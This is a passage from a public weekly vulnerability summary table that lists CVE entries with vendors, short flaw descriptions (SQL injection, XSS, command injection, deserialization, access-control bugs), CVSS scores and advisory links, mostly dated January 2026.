| TYPO3--TYPO3 CMS | TYPO3's mail‑file spool deserialization flaw lets local users with write access to the spool directory craft a malicious file that is deserialized during the mailer:spool:send command, enabling arbitrary PHP code execution on the web server. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1. | 2026-01-13 | not yet calculated | CVE-2026-0859 | https://typo3.org/security/advisory/typo3-core-sa-2026-004 Git commit of main branch Git commit of 13.4 branch Git commit of 12.4 branch |
| Vanilla OS--fabricators ltd | fabricators Ltd Vanilla OS 2 Core image v1.1.0 was discovered to contain static keys for the SSH service, allowing attackers to possibly execute a man-in-the-middle attack during connections with other hosts. | 2026-01-13 | not yet calculated | CVE-2024-54855 | http://vanilla.com http://fabricators.com https://github.com/Vanilla-OS/core-image/security/advisories/GHSA-67pc-hqr2-g34h |
| Viafirma--Inbox | IDOR vulnerability has been found in Viafirma Inbox v4.5.13 that allows any authenticated user without privileges in the application to list all users, access and modify their data. This allows the user's email addresses to be modified and, subsequently, using the password recovery functionality to access the application by impersonating any user, including those with administrative permissions. | 2026-01-12 | not yet calculated | CVE-2025-41077 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products |
| Viafirma--Viafirma Documents | Weaknesses in the authorization mechanisms of Viafirma Documents v3.7.129 allow an authenticated user without privileges to list and access other user data, use user creation, modification, and deletion features, and escalate privileges by impersonating other users of the application in the generation and signing of documents. | 2026-01-12 | not yet calculated | CVE-2025-41078 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-viafirma-products |
| Vivotek--Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 | Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Vivotek Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 (Firmware modules) allows OS Command Injection.This issue affects Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330: 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502, 0125c. | 2026-01-13 | not yet calculated | CVE-2026-22755 | http://www.vapidlabs.com/advisory.php?v=220 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to 5.15.2, the screenshot images were served directly by the HTTP server without proper access control. This could allow an unauthenticated user to access screenshots after guessing their filename. This vulnerability is fixed in 5.15.2. | 2026-01-14 | not yet calculated | CVE-2026-21889 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3g2f-4rjg-9385 https://github.com/WeblateOrg/weblate/pull/17516 https://github.com/WeblateOrg/weblate/commit/a6eb5fd0299780eca286be8ff187dc2d10feec47 |
| WordPress--Dreamer Blog | The Dreamer Blog WordPress theme through 1.2 is vulnerable to arbitrary installations due to a missing capability check. | 2026-01-13 | not yet calculated | CVE-2025-10915 | https://wpscan.com/vulnerability/dab3a804-9027-4b4a-b61c-61b562045bc4/ |
| WordPress--E-xact | Hosted Payment | | The E-xact | Hosted Payment | WordPress plugin through 2.0 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. | 2026-01-13 | not yet calculated | CVE-2025-14829 | https://wpscan.com/vulnerability/872569bc-16fb-427f-accc-147f284137cd/ |
| WordPress--Quiz Maker | The Quiz Maker WordPress plugin before 6.7.0.89 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-01-12 | not yet calculated | CVE-2025-14579 | https://wpscan.com/vulnerability/1ff8ea2b-6513-4d5c-b7ea-9ab39c9ea9c6/ |
| WorkDo--eCommerceGo SaaS | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, consisting of a lack of proper validation of user input by sending a POST request to '/store-ticket', using the 'subject' and 'description' parameters. | 2026-01-12 | not yet calculated | CVE-2025-40977 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--eCommerceGo SaaS | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, consisting of a stored XSS due to a lack of proper validation of user input by sending a POST request to '/ticket/x/conversion', using the 'reply_description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40978 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--HRMGo | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's HRMGo, consisting of a lack of proper validation of user input by sending a POST request to '/hrmgo/ticket/changereply', using the 'description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40975 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| WorkDo--TicketGo | Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's TicketGo, consisting of a lack of proper validation of user input by sending a POST request to '/ticketgo-saas/home', using the 'description' parameter. | 2026-01-12 | not yet calculated | CVE-2025-40976 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-workdo-products |
| xmall--xmall | Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId. | 2026-01-12 | not yet calculated | CVE-2023-36331 | https://github.com/Exrick/xmall/issues/100 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates the payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory. | 2026-01-12 | not yet calculated | CVE-2026-22776 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-h934-98h4-j43q https://github.com/yhirose/cpp-httplib/commit/2e2e47bab1ae6a853476eecbc4bf279dd1fef792 |
| YSoft--SafeQ 6 | Y Soft SafeQ 6 renders the Workflow Connector password field in a way that allows an administrator with UI access to reveal the value using browser developer/inspection tools. The affected customers are only those with a password-protected scan workflow connector. This issue affects Y Soft SafeQ 6 in versions before MU106. | 2026-01-14 | not yet calculated | CVE-2025-13175 | https://www.ysoft.com/safeq https://docs.ysoft.cloud/safeq6/latest/safeq6/release-notes-build-106 https://cert.pl/en/posts/2026/01/CVE-2025-13175 |
| Zhiyuan-Zhyuan | Cross site scripting vulnerability in seeyon Zhiyuan A8+ Collaborative Management Software 7.0 via the topValue parameter to the seeyon/main.do endpoint. | 2026-01-16 | not yet calculated | CVE-2025-56451 | https://www.yuque.com/076w/syst1m/zlp7c6hmowx6cg51?singleDoc https://gist.github.com/076w/b223381ba06b05845d919fb29619777b |
Vulnerability Summary for the Week of January 5, 2026
Posted on Monday January 12, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AA-Team--Amazon Native Shopping Recommendations | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Native Shopping Recommendations allows SQL Injection.This issue affects Amazon Native Shopping Recommendations: from n/a through 1.3. | 2026-01-05 | 9.3 | CVE-2025-30633 | https://vdp.patchstack.com/database/wordpress/plugin/woozone-contextual/vulnerability/wordpress-amazon-native-shopping-recommendations-plugin-1-3-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Premium Age Verification / Restriction for WordPress | Incorrect Privilege Assignment vulnerability in AA-Team Premium Age Verification / Restriction for WordPress, AA-Team Responsive Coming Soon Landing Page / Holding Page for WordPress allows Privilege Escalation.This issue affects Premium Age Verification / Restriction for WordPress: from n/a through 3.0.2; Responsive Coming Soon Landing Page / Holding Page for WordPress: from n/a through 3.0. | 2026-01-06 | 8.8 | CVE-2025-29004 | https://patchstack.com/database/wordpress/plugin/age-restriction/vulnerability/wordpress-premium-age-verification-restriction-for-wordpress-plugin-3-0-2-privilege-escalation-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/plugin/wordpress-flat-countdown/vulnerability/wordpress-responsive-coming-soon-landing-page-holding-page-for-wordpress-3-0-privilege-escalation-vulnerability?_s_id=cve |
| AA-Team--Premium SEO Pack | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Premium SEO Pack allows SQL Injection.This issue affects Premium SEO Pack: from n/a through 3.3.2. | 2026-01-05 | 8.5 | CVE-2025-31044 | https://vdp.patchstack.com/database/wordpress/plugin/premium-seo-pack/vulnerability/wordpress-premium-seo-pack-3-3-2-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Woocommerce Sales Funnel Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS.This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2. | 2026-01-06 | 7.1 | CVE-2025-30631 | https://patchstack.com/database/wordpress/plugin/woosales/vulnerability/wordpress-woocommerce-sales-funnel-builder-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve https://patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ABB--WebPro SNMP Card PowerValue | Incorrect Implementation of Authentication Algorithm vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL.This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 8.8 | CVE-2025-4676 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| Adtecdigital--SignEdje Digital Signage Player | Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions. | 2026-01-06 | 7.5 | CVE-2020-36915 | ExploitDB-48954 Adtec Digital Official Homepage Zero Science Lab Disclosure (ZSL-2020-5603) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Adtec Digital SignEdje Digital Signage Player v2.08.28 Default Credentials |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host's memory. This issue is fixed in version 3.13.3. | 2026-01-05 | 7.5 | CVE-2025-69223 | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a |
| aksharsoftsolutions--AS Password Field In Default Registration Form | The AS Password Field In Default Registration Form plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2026-01-06 | 9.8 | CVE-2025-14996 | https://www.wordfence.com/threat-intel/vulnerabilities/id/061f022b-b922-4499-bb34-8ea91ba5ace3?source=cve https://plugins.trac.wordpress.org/browser/as-password-field-in-default-registration-form/tags/2.0.0/as-password-field-default-registration.php |
| Alibaba--Fastjson | Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845. | 2026-01-09 | 10 | CVE-2025-70974 | https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48 https://www.seebug.org/vuldb/ssvid-98020 https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238 https://www.freebuf.com/vuls/208339.html https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 |
| arraytics--Eventin Event Manager, Event Booking, Calendar, Tickets and Registration Plugin (AI Powered) | The Eventin - Event Manager, Events Calendar, Event Tickets and Registrations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'post_settings' function in all versions up to, and including, 4.0.51. This makes it possible for unauthenticated attackers to modify plugin settings. Furthermore, due to insufficient input sanitization and output escaping on the 'etn_primary_color' setting, this enables unauthenticated attackers to inject arbitrary web scripts that will execute whenever a user accesses a page where Eventin styles are loaded. | 2026-01-09 | 7.2 | CVE-2025-14657 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e4188b26-80f8-41b8-be19-1ddcbd7e39f5?source=cve https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/Enqueue/register.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2FEnqueue%2Fregister.php https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/base/api-handler.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fbase%2Fapi-handler.php https://plugins.trac.wordpress.org/changeset/3429942/wp-event-solution/trunk/core/event/api.php?old=3390273&old_path=wp-event-solution%2Ftrunk%2Fcore%2Fevent%2Fapi.php |
| Arteco-Global--Arteco Web Client DVR/NVR | Arteco Web Client DVR/NVR contains a session hijacking vulnerability with insufficient session ID complexity that allows remote attackers to bypass authentication. Attackers can brute force session IDs within a specific numeric range to obtain valid sessions and access live camera streams without authorization. | 2026-01-06 | 9.8 | CVE-2020-36925 | ExploitDB-49348 Arteco Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5613) Packet Storm Security Exploit Archive IBM X-Force Exchange Vulnerability Entry 1 IBM X-Force Exchange Vulnerability Entry 2 CXSecurity Vulnerability Listing VulnCheck Advisory: Arteco Web Client DVR/NVR Session ID Brute Force Authentication Bypass |
| AWS--Kiro IDE | Processing specially crafted workspace folder names could allow for arbitrary command injection in the Kiro GitLab Merge-Request helper in Kiro IDE before version 0.6.18 when opening maliciously crafted workspaces. To mitigate, users should update to the latest version. | 2026-01-09 | 7.8 | CVE-2026-0830 | https://kiro.dev/changelog/spec-correctness-and-cli/ https://aws.amazon.com/security/security-bulletins/2026-001-AWS/ |
| bg5sbk--MiniCMS | A vulnerability was found in bg5sbk MiniCMS up to 1.8. The impacted element is an unknown function of the file /minicms/mc-admin/post.php of the component Trash File Restore Handler. Performing a manipulation results in improper authentication. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 7.3 | CVE-2025-15457 | VDB-339490 | bg5sbk MiniCMS Trash File Restore post.php improper authentication VDB-339490 | CTI Indicators (IOB, IOC, IOA) Submit #725139 | MiniCMS https://github.com/bg5sbk/MiniCMS V1.8 unauthorized vulnerability https://github.com/ueh1013/VULN/issues/12 |
| bg5sbk--MiniCMS | A vulnerability was determined in bg5sbk MiniCMS up to 1.8. This affects an unknown function of the file /mc-admin/post-edit.php of the component Article Handler. Executing a manipulation can lead to improper authentication. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 7.3 | CVE-2025-15458 | VDB-339491 | bg5sbk MiniCMS Article post-edit.php improper authentication VDB-339491 | CTI Indicators (IOB, IOC, IOA) Submit #725142 | MiniCMS https://github.com/bg5sbk/MiniCMS V1.8 unauthorized vulnerability https://github.com/ueh1013/VULN/issues/9 |
| Brecht--Custom Related Posts | Insertion of Sensitive Information Into Sent Data vulnerability in Brecht Custom Related Posts allows Retrieve Embedded Sensitive Data.This issue affects Custom Related Posts: from n/a through 1.8.0. | 2026-01-05 | 7.5 | CVE-2025-68033 | https://vdp.patchstack.com/database/wordpress/plugin/custom-related-posts/vulnerability/wordpress-custom-related-posts-plugin-1-8-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| buddydev--BuddyPress Xprofile Custom Field Types | The BuddyPress Xprofile Custom Field Types plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete_field' function in all versions up to, and including, 1.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). | 2026-01-06 | 7.2 | CVE-2025-14997 | https://www.wordfence.com/threat-intel/vulnerabilities/id/89a7a717-dac3-490e-89dd-268be8eb7bf5?source=cve https://plugins.trac.wordpress.org/browser/bp-xprofile-custom-field-types/tags/1.2.8/src/handlers/class-field-upload-helper.php https://plugins.trac.wordpress.org/changeset/3430565/bp-xprofile-custom-field-types |
| CAYIN Technology--SMP-8000QD | Cayin Signage Media Player 3.0 contains an authenticated remote command injection vulnerability in system.cgi and wizard_system.cgi pages. Attackers can exploit the 'NTP_Server_IP' parameter with default credentials to execute arbitrary shell commands as root. | 2026-01-06 | 8.8 | CVE-2020-36910 | ExploitDB-48557 Cayin Technology Official Website Zero Science Lab Disclosure (ZSL-2020-5569) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Listing VulnCheck Advisory: Cayin Signage Media Player 3.0 Authenticated Remote Command Injection via NTP Parameter |
| Centreon--Infra Monitoring | Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3. | 2026-01-05 | 9.8 | CVE-2025-15026 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357 |
| Centreon--Infra Monitoring | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows SQL Injection to unauthenticated user. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3. | 2026-01-05 | 9.8 | CVE-2025-15029 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356 |
| Centreon--Infra Monitoring | In the backup parameters, a user with high privilege is able to concatenate custom instructions to the backup setup. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Centreon Infra Monitoring (Backup configuration in the administration setup modules) allows OS Command Injection.This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 7.2 | CVE-2025-5965 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5965-centreon-web-high-severity-5362 |
| code-projects--Intern Membership Management System | A vulnerability was determined in code-projects Intern Membership Management System 1.0. Affected is an unknown function of the file /intern/admin/check_admin.php. Executing a manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-08 | 7.3 | CVE-2026-0700 | VDB-339977 | code-projects Intern Membership Management System check_admin.php sql injection VDB-339977 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733001 | code-projects Intern Membership Management System check_admin.php 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Intern%20Membership%20Management%20System/Intern%20Membership%20Management%20System%20check_admin.php%20sql%20injection.md https://code-projects.org/ |
| code-projects--Online Music Site | A security vulnerability has been detected in code-projects Online Music Site 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. Such manipulation of the argument username/password leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. | 2026-01-05 | 7.3 | CVE-2026-0605 | VDB-339549 | code-projects Online Music Site login.php sql injection VDB-339549 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731695 | code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A52.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A52.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was detected in code-projects Online Music Site 1.0. Affected by this issue is some unknown functionality of the file /FrontEnd/Albums.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-05 | 7.3 | CVE-2026-0606 | VDB-339550 | code-projects Online Music Site Albums.php sql injection VDB-339550 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731696 | code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A51.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A51.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A flaw has been found in code-projects Online Music Site 1.0. This affects an unknown part of the file /Administrator/PHP/AdminViewSongs.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2026-01-05 | 7.3 | CVE-2026-0607 | VDB-339551 | code-projects Online Music Site AdminViewSongs.php sql injection VDB-339551 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731697 | code-projects https://code-projects.org/online-music-site-in-php-with-source-code/ 1.0 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A53.md https://github.com/xkalami-Tta0/CVE/blob/main/Online%20Music%20Site/SQL%E6%B3%A8%E5%85%A53.md#vulnerability-details-and-poc https://code-projects.org/ |
| code-projects--Online Music Site | A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-01-11 | 7.3 | CVE-2026-0851 | VDB-340446 | code-projects Online Music Site AdminAddUser.php sql injection VDB-340446 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #733644 | Code-Projects Online Music Site V1.0 SQLinjection https://github.com/tuo159515/sql-injection/issues/2 https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security flaw has been discovered in code-projects Online Product Reservation System 1.0. This vulnerability affects unknown code of the file app/user/login.php of the component User Login. The manipulation of the argument emailadd results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-05 | 7.3 | CVE-2026-0583 | VDB-339475 | code-projects Online Product Reservation System User Login login.php sql injection VDB-339475 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731093 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_login.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_login.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security vulnerability has been detected in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the file /order_view.php of the component GET Parameter Handler. Such manipulation of the argument transaction_id leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-01-05 | 7.3 | CVE-2026-0585 | VDB-339477 | code-projects Online Product Reservation System GET Parameter order_view.php sql injection VDB-339477 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731096 | code-projects Online Product Reservation system V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_order_view.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_order_view.php.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A vulnerability was found in code-projects Online Product Reservation System 1.0. Impacted is an unknown function of the component Administration Backend. The manipulation results in improper authentication. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-01-05 | 7.3 | CVE-2026-0589 | VDB-339499 | code-projects Online Product Reservation System Administration Backend improper authentication VDB-339499 | CTI Indicators (IOB, IOC) Submit #731127 | code-projects Online Product Reservation System V1.0 Authentication Bypass Issues https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/auth_bypass_admin_panel.md#poc https://code-projects.org/ |
| code-projects--Online Product Reservation System | A security flaw has been discovered in code-projects Online Product Reservation System 1.0. This affects an unknown function of the file /handgunner-administrator/register_code.php of the component User Registration Handler. Performing a manipulation of the argument fname/lname/address/city/province/country/zip/tel_no/email/username results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-05 | 7.3 | CVE-2026-0592 | VDB-339502 | code-projects Online Product Reservation System User Registration register_code.php sql injection VDB-339502 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731130 | code-projects Online Product Reservation System V1.0 SQL Injection https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_register_code.php.md https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/sqli_register_code.php.md#poc https://code-projects.org/ |
| codename065--Download Manager | The Download Manager plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.3.40. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for unauthenticated attackers to change user's passwords, except administrators, and leverage that to gain access to their account. | 2026-01-06 | 7.3 | CVE-2025-15364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/067031e8-6aa8-451c-a318-b1848c7a4f92?source=cve https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.40/src/__/Crypt.php#L18 https://plugins.trac.wordpress.org/changeset/3431915/download-manager#file7 |
| Codepeople--Sell Downloads | Missing Authorization vulnerability in Codepeople Sell Downloads allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sell Downloads: from n/a through 1.1.12. | 2026-01-05 | 7.5 | CVE-2025-68850 | https://vdp.patchstack.com/database/wordpress/plugin/sell-downloads/vulnerability/wordpress-sell-downloads-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve |
| Columbia Weather Systems--MicroServer | An unused function in MicroServer can start a reverse SSH connection to a vendor registered domain, without mutual authentication. An attacker on the local network with admin access to the web server, and the ability to manipulate DNS responses, can redirect the SSH connection to an attacker controlled device. | 2026-01-07 | 8.8 | CVE-2025-61939 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| Columbia Weather Systems--MicroServer | An unused webshell in MicroServer allows unlimited login attempts, with sudo rights on certain files and directories. An attacker with admin access to MicroServer can gain limited shell access, enabling persistence through reverse shells, and the ability to modify or remove data stored in the file system. | 2026-01-07 | 8 | CVE-2025-66620 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-006-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-006-01.json |
| Comfy-Org--ComfyUI-Manager | ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5. | 2026-01-10 | 7.5 | CVE-2026-22777 | https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2 https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, the Git Repository field during project creation is vulnerable to command injection. User input is not properly sanitized, allowing attackers to inject arbitrary shell commands that execute on the underlying server during the deployment workflow. A regular member user can exploit this vulnerability. Version 4.0.0-beta.420.7 contains a patch for the issue. | 2026-01-05 | 10 | CVE-2025-59157 | https://github.com/coollabsio/coolify/security/advisories/GHSA-5cg9-38qj-8mc3 |
